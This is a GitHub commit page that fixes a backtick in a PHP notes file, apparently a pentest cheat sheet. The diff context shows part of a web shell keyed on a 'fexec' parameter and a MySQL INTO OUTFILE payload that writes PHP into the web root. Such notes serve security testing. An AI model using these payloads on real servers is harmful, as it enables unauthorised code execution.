Skip to content

Commit

Permalink
Update php.md
Browse files Browse the repository at this point in the history
  • Loading branch information
jamieparfet authored Apr 11, 2018
1 parent 3d26e7f commit 38d8fe3
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion misc/php.md
Original file line number Diff line number Diff line change
Expand Up @@ -15,4 +15,4 @@ if (isset($_REQUEST['fexec'])) {
`<?php echo $_SERVER["REMOTE_ADDR"];`

### MySQL
`SELECT "<?phpinfo()" into OUTFILE "/var/www/html/infox.php"
`SELECT "<?phpinfo()" into OUTFILE "/var/www/html/infox.php"`

0 comments on commit 38d8fe3

Please # to comment.